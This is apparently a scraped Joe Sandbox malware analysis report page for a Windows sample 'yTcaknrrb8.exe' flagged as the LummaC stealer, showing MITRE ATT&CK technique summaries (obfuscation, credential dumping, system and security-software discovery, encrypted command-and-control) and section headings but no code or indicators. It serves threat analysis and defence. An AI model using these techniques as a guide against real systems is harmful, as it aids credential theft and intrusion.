Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yTcaknrrb8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
yTcaknrrb8.exe